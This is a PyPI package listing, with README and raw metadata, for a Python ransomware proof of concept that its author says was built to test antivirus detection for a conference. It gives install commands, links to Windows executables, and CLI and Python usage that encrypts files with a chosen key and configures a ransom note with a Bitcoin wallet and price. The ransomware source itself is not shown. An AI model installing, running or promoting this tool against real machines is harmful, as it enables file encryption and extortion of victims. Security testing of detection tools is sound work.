RansomWare


NameRansomWare JSON
Version 1.0.0 PyPI version JSON
download
home_pagehttps://github.com/mauricelambert/RansomWare
SummaryThis package implements a cross platform RansomWare.
upload_time2025-01-28 21:58:55
maintainerMaurice Lambert
docs_urlNone
authorMaurice Lambert
requires_python>=3.8
licenseGPL-3.0 License
keywords ransmware cryptolocker malware cyberattack
VCS
bugtrack_url
requirements No requirements were recorded.
Travis-CI No Travis.
coveralls test coverage No coveralls.
            ![RansomWare Logo](https://mauricelambert.github.io/info/python/security/RansomWare_small.png "RansomWare logo")

# RansomWare

## Description

This package implements a cross platform RansomWare.

> Don't use this ransomware POC for illegal purposes!
>> This project is developed to test and demonstrate the behavior of antivirus against unknown malware in the context of a specific cybersecurity conference.
>> This malware is basic, it doesn't try to bypass any antivirus, EPP or EDR protection.
>> It can't be used for red team or pentest as it will get stuck, so don't try or you'll waste your time.

## Requirements

This package require:

 - python3
 - python3 Standard Library

## Installation

### Pip

```bash
python3 -m pip install RansomWare
```

### Git

```bash
git clone "https://github.com/mauricelambert/RansomWare.git"
cd "RansomWare"
python3 -m pip install .
```

### Wget

```bash
wget https://github.com/mauricelambert/RansomWare/archive/refs/heads/main.zip
unzip main.zip
cd RansomWare-main
python3 -m pip install .
```

### cURL

```bash
curl -O https://github.com/mauricelambert/RansomWare/archive/refs/heads/main.zip
unzip main.zip
cd RansomWare-main
python3 -m pip install .
```

## Usages

## Command line

```bash
RansomWare              # Using CLI package executable
python3 -m RansomWare   # Using python module
python3 RansomWare.pyz  # Using python executable
RansomWare.exe          # Using python Windows executable

RansomWare aaa # File encryption using "aaa" as key
RansomWare -t 56 aaa # File encryption using "aaa" as key and sleep 56 secondes between file.
RansomWare -e 64 YWFh # File encryption using "aaa" as key (encoded with base64)
RansomWare -w "3LU8wRu4ZnXP4UM8Yo6kkTiGHM9BubgyiG" aaa # File encryption using "aaa" as key and using the wallet: "3LU8wRu4ZnXP4UM8Yo6kkTiGHM9BubgyiG" for ransomnote
RansomWare -c BitCoin aaa # File encryption using "aaa" as key and using the cryptocurrency: "BitCoin" for ransomnote
RansomWare -p 0.01 aaa # File encryption using "aaa" as key and using "0.01" as price
```

### Python script

```python
from RansomWare import RansomWare

def get_IV(filename: str) -> bytes:
	"""
    This function return my weak custom IV.
    """

	return filename.encode()

def crypt(key: bytes, data:bytes) -> bytes:
	"""
    This function encrypts data with key.
    """

	return bytes([(car + key[i % len(key)]) % 256 for i, car in enumerate(data)])

RansomWare(
    b"aaa",
    url="http://127.0.0.1:8000/",
    wallet="3LU8wRu4ZnXP4UM8Yo6kkTiGHM9BubgyiG",
    crypto="BitCoin",
    price="0.01",
    interval_time=56,
    encrypt=crypt,
    get_iv=get_IV,
).start()
```

## Links

 - [Pypi](https://pypi.org/project/RansomWare/)
 - [Github](https://github.com/mauricelambert/RansomWare/)
 - [Documentation](https://mauricelambert.github.io/info/python/security/RansomWare.html)
 - [Python executable](https://mauricelambert.github.io/info/python/security/RansomWare.pyz)
 - [Python Windows executable](https://mauricelambert.github.io/info/python/security/RansomWare.exe)
 - [Github - Python Windows compiled executable](https://github.com/mauricelambert/RansomWare/releases/latest/)
 - [SourceForce - Python Windows compiled executable](https://sourceforge.net/projects/RansomWare/files/)

## Licence

Licensed under the [GPL, version 3](https://www.gnu.org/licenses/).

            

Raw data

            {
    "_id": null,
    "home_page": "https://github.com/mauricelambert/RansomWare",
    "name": "RansomWare",
    "maintainer": "Maurice Lambert",
    "docs_url": null,
    "requires_python": ">=3.8",
    "maintainer_email": "Maurice Lambert <mauricelambert434@gmail.com>",
    "keywords": "RansmWare, CryptoLocker, Malware, CyberAttack",
    "author": "Maurice Lambert",
    "author_email": "Maurice Lambert <mauricelambert434@gmail.com>",
    "download_url": "https://files.pythonhosted.org/packages/9a/bc/9288a81ed3adc53a49fd8cc484b56bc3ce2a42cb6c4825c032a2226df767/ransomware-1.0.0.tar.gz",
    "platform": "Windows",
    "description": "![RansomWare Logo](https://mauricelambert.github.io/info/python/security/RansomWare_small.png \"RansomWare logo\")\n\n# RansomWare\n\n## Description\n\nThis package implements a cross platform RansomWare.\n\n> Don't use this ransomware POC for illegal purposes!\n>> This project is developed to test and demonstrate the behavior of antivirus against unknown malware in the context of a specific cybersecurity conference.\n>> This malware is basic, it doesn't try to bypass any antivirus, EPP or EDR protection.\n>> It can't be used for red team or pentest as it will get stuck, so don't try or you'll waste your time.\n\n## Requirements\n\nThis package require:\n\n - python3\n - python3 Standard Library\n\n## Installation\n\n### Pip\n\n```bash\npython3 -m pip install RansomWare\n```\n\n### Git\n\n```bash\ngit clone \"https://github.com/mauricelambert/RansomWare.git\"\ncd \"RansomWare\"\npython3 -m pip install .\n```\n\n### Wget\n\n```bash\nwget https://github.com/mauricelambert/RansomWare/archive/refs/heads/main.zip\nunzip main.zip\ncd RansomWare-main\npython3 -m pip install .\n```\n\n### cURL\n\n```bash\ncurl -O https://github.com/mauricelambert/RansomWare/archive/refs/heads/main.zip\nunzip main.zip\ncd RansomWare-main\npython3 -m pip install .\n```\n\n## Usages\n\n## Command line\n\n```bash\nRansomWare              # Using CLI package executable\npython3 -m RansomWare   # Using python module\npython3 RansomWare.pyz  # Using python executable\nRansomWare.exe          # Using python Windows executable\n\nRansomWare aaa # File encryption using \"aaa\" as key\nRansomWare -t 56 aaa # File encryption using \"aaa\" as key and sleep 56 secondes between file.\nRansomWare -e 64 YWFh # File encryption using \"aaa\" as key (encoded with base64)\nRansomWare -w \"3LU8wRu4ZnXP4UM8Yo6kkTiGHM9BubgyiG\" aaa # File encryption using \"aaa\" as key and using the wallet: \"3LU8wRu4ZnXP4UM8Yo6kkTiGHM9BubgyiG\" for ransomnote\nRansomWare -c BitCoin aaa # File encryption using \"aaa\" as key and using the cryptocurrency: \"BitCoin\" for ransomnote\nRansomWare -p 0.01 aaa # File encryption using \"aaa\" as key and using \"0.01\" as price\n```\n\n### Python script\n\n```python\nfrom RansomWare import RansomWare\n\ndef get_IV(filename: str) -> bytes:\n\t\"\"\"\n    This function return my weak custom IV.\n    \"\"\"\n\n\treturn filename.encode()\n\ndef crypt(key: bytes, data:bytes) -> bytes:\n\t\"\"\"\n    This function encrypts data with key.\n    \"\"\"\n\n\treturn bytes([(car + key[i % len(key)]) % 256 for i, car in enumerate(data)])\n\nRansomWare(\n    b\"aaa\",\n    url=\"http://127.0.0.1:8000/\",\n    wallet=\"3LU8wRu4ZnXP4UM8Yo6kkTiGHM9BubgyiG\",\n    crypto=\"BitCoin\",\n    price=\"0.01\",\n    interval_time=56,\n    encrypt=crypt,\n    get_iv=get_IV,\n).start()\n```\n\n## Links\n\n - [Pypi](https://pypi.org/project/RansomWare/)\n - [Github](https://github.com/mauricelambert/RansomWare/)\n - [Documentation](https://mauricelambert.github.io/info/python/security/RansomWare.html)\n - [Python executable](https://mauricelambert.github.io/info/python/security/RansomWare.pyz)\n - [Python Windows executable](https://mauricelambert.github.io/info/python/security/RansomWare.exe)\n - [Github - Python Windows compiled executable](https://github.com/mauricelambert/RansomWare/releases/latest/)\n - [SourceForce - Python Windows compiled executable](https://sourceforge.net/projects/RansomWare/files/)\n\n## Licence\n\nLicensed under the [GPL, version 3](https://www.gnu.org/licenses/).\n",
    "bugtrack_url": null,
    "license": "GPL-3.0 License",
    "summary": "This package implements a cross platform RansomWare.",
    "version": "1.0.0",
    "project_urls": {
        "Documentation": "https://mauricelambert.github.io/info/python/security/RansomWare.html",
        "Download": "https://mauricelambert.github.io/info/python/security/RansomWare.pyz",
        "Git Windows compiled executable": "https://github.com/mauricelambert/RansomWare/releases/latest/",
        "Github": "https://github.com/mauricelambert/RansomWare",
        "Homepage": "https://github.com/mauricelambert/RansomWare",
        "Python Executable": "https://mauricelambert.github.io/info/python/security/RansomWare.pyz",
        "Windows Executable": "https://mauricelambert.github.io/info/python/security/RansomWare.exe",
        "Windows compiled executable": "https://sourceforge.net/projects/RansomWare/files/"
    },
    "split_keywords": [
        "ransmware",
        " cryptolocker",
        " malware",
        " cyberattack"
    ],
    "urls": [
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "9abc9288a81ed3adc53a49fd8cc484b56bc3ce2a42cb6c4825c032a2226df767",
                "md5": "645dc1c718f60ceee10b6c68c77128c1",
                "sha256": "2246c309e42c53a37de71ec2b679a4384fed9bebf0ca4c0a97ddbb0f8f7fee22"
            },
            "downloads": -1,
            "filename": "ransomware-1.0.0.tar.gz",
            "has_sig": false,
            "md5_digest": "645dc1c718f60ceee10b6c68c77128c1",
            "packagetype": "sdist",
            "python_version": "source",
            "requires_python": ">=3.8",
            "size": 24412,
            "upload_time": "2025-01-28T21:58:55",
            "upload_time_iso_8601": "2025-01-28T21:58:55.274970Z",
            "url": "https://files.pythonhosted.org/packages/9a/bc/9288a81ed3adc53a49fd8cc484b56bc3ce2a42cb6c4825c032a2226df767/ransomware-1.0.0.tar.gz",
            "yanked": false,
            "yanked_reason": null
        }
    ],
    "upload_time": "2025-01-28 21:58:55",
    "github": true,
    "gitlab": false,
    "bitbucket": false,
    "codeberg": false,
    "github_user": "mauricelambert",
    "github_project": "RansomWare",
    "travis_ci": false,
    "coveralls": false,
    "github_actions": false,
    "lcname": "ransomware"
}
        
Elapsed time: 0.52535s